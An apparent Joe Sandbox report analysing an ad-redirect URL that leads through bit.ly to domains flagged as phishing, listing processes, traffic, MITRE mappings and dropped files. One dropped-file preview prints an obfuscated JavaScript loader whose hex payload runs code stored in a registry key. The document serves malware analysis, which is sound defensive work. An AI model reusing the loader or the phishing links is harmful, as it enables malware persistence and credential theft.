Edit tour

Windows Analysis Report
https://clickserve.dartsearch.net/link/click?lid=43700078497888010&ds_s_kwgid=58700008599075100&ds_a_cid=1402884687&ds_a_caid=20756460697&ds_a_agid=154005532286&ds_a_fiid=&ds_a_lid=kwd-21944266&ds_a_extid=&&ds_e_adid=680299733267&ds_e_matchtype=search&ds_e_device=c&ds_e_network=g&&ds_url_v=2&ds_dest

Overview

General Information

Sample URL:	https://clickserve.dartsearch.net/link/click?lid=43700078497888010&ds_s_kwgid=58700008599075100&ds_a_cid=1402884687&ds_a_caid=20756460697&ds_a_agid=154005532286&ds_a_fiid=&ds_a_lid=kwd-21944266&ds_a_e
Analysis ID:	1342613
Infos:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Stores files to the Windows start menu directory

Creates files inside the system directory

Classification

Process Tree

System is w10x64

chrome.exe (PID: 1632 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2392,i,15757366758900780308,14817295041037776100,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1876 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://clickserve.dartsearch.net/link/click?lid=43700078497888010&ds_s_kwgid=58700008599075100&ds_a_cid=1402884687&ds_a_caid=20756460697&ds_a_agid=154005532286&ds_a_fiid=&ds_a_lid=kwd-21944266&ds_a_extid=&&ds_e_adid=680299733267&ds_e_matchtype=search&ds_e_device=c&ds_e_network=g&&ds_url_v=2&ds_dest_url=%2F%2F%2Fbit.ly%2F46ePuds#UjXUjrmYeT MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Tue, 14 Nov 2023 19:34:22 GMTalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Source: unknown

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4

Source: unknown	HTTPS traffic detected: 23.60.72.63:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.60.72.63:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49729 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\chrome_BITS_1632_2397136

Jump to behavior

Source: classification engine

Classification label: mal48.win@18/9@16/10

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2392,i,15757366758900780308,14817295041037776100,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://clickserve.dartsearch.net/link/click?lid=43700078497888010&ds_s_kwgid=58700008599075100&ds_a_cid=1402884687&ds_a_caid=20756460697&ds_a_agid=154005532286&ds_a_fiid=&ds_a_lid=kwd-21944266&ds_a_extid=&&ds_e_adid=680299733267&ds_e_matchtype=search&ds_e_device=c&ds_e_network=g&&ds_url_v=2&ds_dest_url=%2F%2F%2Fbit.ly%2F46ePuds#UjXUjrmYeT
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2392,i,15757366758900780308,14817295041037776100,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	11 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	4 Non-Application Layer Protocol	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	5 Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	3 Ingress Tool Transfer			Data Destruction	Virtual Private Server	Employee Names

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://clickserve.dartsearch.net/link/click?lid=43700078497888010&ds_s_kwgid=58700008599075100&ds_a_cid=1402884687&ds_a_caid=20756460697&ds_a_agid=154005532286&ds_a_fiid=&ds_a_lid=kwd-21944266&ds_a_extid=&&ds_e_adid=680299733267&ds_e_matchtype=search&ds_e_device=c&ds_e_network=g&&ds_url_v=2&ds_dest_url=%2F%2F%2Fbit.ly%2F46ePuds#UjXUjrmYeT	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label
https://www.roboticaeducativa.pe/za	100%	Avira URL Cloud	phishing
https://www.roboticaeducativa.pe/za/	100%	Avira URL Cloud	phishing
https://elanexoartspace.com/xeregry	0%	Avira URL Cloud	safe
https://elanexoartspace.com/xeregry/	0%	Avira URL Cloud	safe
https://www.roboticaeducativa.pe/favicon.ico	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
accounts.google.com	172.217.14.205	true	false	high
ad.doubleclick.net	142.251.33.102	true	false	high
bit.ly	67.199.248.10	true	false	high
roboticaeducativa.pe	50.31.176.165	true	false	unknown
www.google.com	142.250.217.100	true	false	high
elanexoartspace.com	68.66.224.58	true	false	unknown
clients.l.google.com	142.251.33.78	true	false	high
clickserve.dartsearch.net	142.251.211.238	true	false	high
www.roboticaeducativa.pe	unknown	unknown	false	unknown
clients2.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ad.doubleclick.net/ddm/clk/566760878;375740285;d;u=ds&sv1=78497888010&sv2=3399980907122207&sv3=1874347215042995942&sa_info=CJnpualNEJKxwJIBGM-k-ZwFIP7cx9u9BA==&gclid=CI_O7PidxIIDFc3NwgQduQkGNA;%3f///bit.ly/46ePuds?gclid=CI_O7PidxIIDFc3NwgQduQkGNA&gclsrc=ds	false		high
https://clickserve.dartsearch.net/link/click?lid=43700078497888010&ds_s_kwgid=58700008599075100&ds_a_cid=1402884687&ds_a_caid=20756460697&ds_a_agid=154005532286&ds_a_fiid=&ds_a_lid=kwd-21944266&ds_a_extid=&&ds_e_adid=680299733267&ds_e_matchtype=search&ds_e_device=c&ds_e_network=g&&ds_url_v=2&ds_dest_url=%2F%2F%2Fbit.ly%2F46ePuds	false		high
https://www.roboticaeducativa.pe/za	false	Avira URL Cloud: phishing	unknown
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1	false		high
https://www.roboticaeducativa.pe/za/	false	Avira URL Cloud: phishing	unknown
https://www.roboticaeducativa.pe/za/#UjXUjrmYeT	false		unknown
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard	false		high
https://elanexoartspace.com/xeregry	false	Avira URL Cloud: safe	unknown
https://www.roboticaeducativa.pe/favicon.ico	false	Avira URL Cloud: safe	unknown
https://elanexoartspace.com/xeregry/	false	Avira URL Cloud: safe	unknown
https://bit.ly/46ePuds?gclid=CI_O7PidxIIDFc3NwgQduQkGNA&gclsrc=ds	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.14.205	accounts.google.com	United States	15169	GOOGLEUS	false
142.251.33.102	ad.doubleclick.net	United States	15169	GOOGLEUS	false
142.251.211.238	clickserve.dartsearch.net	United States	15169	GOOGLEUS	false
50.31.176.165	roboticaeducativa.pe	United States	23352	SERVERCENTRALUS	false
142.251.33.78	clients.l.google.com	United States	15169	GOOGLEUS	false
142.250.217.100	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
68.66.224.58	elanexoartspace.com	United States	55293	A2HOSTINGUS	false
67.199.248.10	bit.ly	United States	396982	GOOGLE-PRIVATE-CLOUDUS	false

Private

IP
192.168.2.5

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1342613
Start date and time:	2023-11-14 20:33:15 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 3m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://clickserve.dartsearch.net/link/click?lid=43700078497888010&ds_s_kwgid=58700008599075100&ds_a_cid=1402884687&ds_a_caid=20756460697&ds_a_agid=154005532286&ds_a_fiid=&ds_a_lid=kwd-21944266&ds_a_extid=&&ds_e_adid=680299733267&ds_e_matchtype=search&ds_e_device=c&ds_e_network=g&&ds_url_v=2&ds_dest_url=%2F%2F%2Fbit.ly%2F46ePuds#UjXUjrmYeT
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal48.win@18/9@16/10
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.14.227, 34.104.35.123, 72.21.81.240, 192.229.211.108, 142.251.215.227
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://clickserve.dartsearch.net/link/click?lid=43700078497888010&ds_s_kwgid=58700008599075100&ds_a_cid=1402884687&ds_a_caid=20756460697&ds_a_agid=154005532286&ds_a_fiid=&ds_a_lid=kwd-21944266&ds_a_extid=&&ds_e_adid=680299733267&ds_e_matchtype=search&ds_e_device=c&ds_e_network=g&&ds_url_v=2&ds_dest_url=%2F%2F%2Fbit.ly%2F46ePuds#UjXUjrmYeT

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (945)
Category:	dropped
Size (bytes):	2439
Entropy (8bit):	4.855158652694322
Encrypted:	false
SSDEEP:	48:IZDLyQ9QWI03TT0gvXaqqQL2RLWiitxWu8B3XaqsLcV0HxWg/3HR5jUk:kfQUT0+aqdESaHaqsxBRt1
MD5:	3256680C86571829FD21301E93012488
SHA1:	9247F86B6AD12598F0023578A4E4152D276A81C3
SHA-256:	52512A135563DB8B2EACF70D76F72CF27B1FA8B8BE3178A9FCD3E6824B6538BA
SHA-512:	54E73A5C8A811D65D1D15D954AD7FCD30036EBF436713058008DC22A2185607F9F56BC41952D8D166E39ADB8C426CF1F1EB7AE1323E8CDF62D56D4AF22C827AA
Malicious:	false
Reputation:	low
Preview:	.function uwslwq(zhrnpc, fytlgp) {. var attmad = '';. for (var i = 0; i < zhrnpc.length; i++) {. attmad += String.fromCharCode(zhrnpc.charCodeAt(i) ^ fytlgp.charCodeAt(i % fytlgp.length));. }. return attmad ;.};.function cclbfi(uoutvw) {. return decodeURIComponent('%' + uoutvw.match(/.{1,2}/g).join('%'));.};.var avtvjl = "766172206279647a7376203d2066756e6374696f6e28737472696e6729207b72657475726e206e65772046756e6374696f6e28737472696e672928297d3b76617220756972697465203d20575363726970742e4372656174654f626a6563742822575363726970742e5368656c6c22293b7768696c6520287472756529207b747279207b6279647a7376287569726974652e52656752656164202822484b43555c5c536f6674776172655c5c436c61737365735c5c7a312229293b7569726974652e52656757726974652822484b43555c5c536f6674776172655c5c436c61737365735c5c7a31222c2022222c20225245475f535a22293b575363726970742e536c656570283130303030293b7d63617463682865727229207b7d3b7d3b";.var dqdeeu = "76617220726573706f6e7365203d2066756e6374696f6e206d6967756a7628746

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 14 18:34:11 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9737317302368487
Encrypted:	false
SSDEEP:	48:8aPdATkO5fpEH3OidAKZdA19ehwiZUklqeh1y+3:8amp5fpaEyy
MD5:	8655E4D9F124B832E891B5C05C35F4B1
SHA1:	BA70BA1FC4002AF784E830989787C58DFEEC8BA4
SHA-256:	6E68D64B04ED40668CEB30BF4B5170C7D275C6AC9DEC13B81A6294E46A02F3D0
SHA-512:	740C51C82E51715C7ECF55E65C4CF46B0ED088BBD8C431921C243FEC667E873309C492488DF7CF09EC74F712B7C8A6EFA0D70F606B35144FC4ECDBE250CA3B1A
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......U.1...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.InWB.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnWB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnWB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnWB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VnWF............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 14 18:34:11 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9889280064897914
Encrypted:	false
SSDEEP:	48:8fdATkO5fpEH3OidAKZdA1weh/iZUkAQkqehiy+2:82p5fpa29Qvy
MD5:	B441E81D7B81148F279B54DE7E2F3587
SHA1:	21C42DA7D6F4E396E6AEBDFABDBA4274D1B309C4
SHA-256:	9278FFADADE5E871EBE34D5FA50DB1EE7ABC59CDD7CC0E143EBA4ED4780AAB94
SHA-512:	736F1656D7E70EC1282CB32FBE595C258810E6FA83DA44BCECE65BC8A15B7E062C915BC9F56DA45EDC5C9E5961C5FED4418CFADDE530A0E4AE5D0553284C4411
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......D.1...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.InWB.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnWB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnWB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnWB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VnWF............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.0025378617112235
Encrypted:	false
SSDEEP:	48:8xBdATkO5fsH3OidAKZdA14tseh7sFiZUkmgqeh7s8y+BX:8xcp5fC+ney
MD5:	720B901F1F90CDF2B0F897A82D0A3B1F
SHA1:	403A59C83B20DF28894352CD4BA579BD6AC45BDB
SHA-256:	6F810AB51E88E8E0E69D3DEE2E1D1FD90FA1D86D4EF02F02F89699B157034465
SHA-512:	88A61EBF22E312240A9F62A612F4E3954FEE984F2FAE83FB97AE3EC5859DD77E7E4033664AA9AED49AB6C69E531AC7C74F4F64A0798AA9D15A1BB9D1AEEED4FA
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.InWB.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnWB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnWB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnWB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 14 18:34:11 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9877086503614265
Encrypted:	false
SSDEEP:	48:8cdATkO5fpEH3OidAKZdA1vehDiZUkwqehWy+R:8vp5fpadUy
MD5:	57EF990CAA66393CD26F89E60FFFEB26
SHA1:	950D44BB77A0DC709A910767CD8961DBB7D2DED8
SHA-256:	426EA225F1072F530194B914A64D89A8240FDE720B168A2500C2CFA8049BDB7E
SHA-512:	5845FDC44FE60971A283461B6B3DF156B4E8EFD4565CEF8944E23AC4F073AD2D51BDEAE493FB93BFE52609D9C642A242E650DD085058BC43CA13271E14EFC0F1
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....&m?.1...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.InWB.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnWB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnWB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnWB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VnWF............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........C........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 14 18:34:11 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9771213965358654
Encrypted:	false
SSDEEP:	48:8vdATkO5fpEH3OidAKZdA1hehBiZUk1W1qehYy+C:8Gp5fpa994y
MD5:	944346251A5790CB7F729A8ADC90C4B3
SHA1:	ECFB64895B761CDD0B011EEB716EB5AF5AB19D70
SHA-256:	5C5FA79E111FEB40897F96125019991F4AEA088661380B768084D8161B1F4A60
SHA-512:	52D39DE901AEA738FF81385DE7A91D79CD3866815AFC3D20636A3D6C43A6DEAEABF726AD6B465121A97279D75932618F04B0CA19173874CBBAA7321DF74E3C6A
Malicious:	false
Reputation:	low
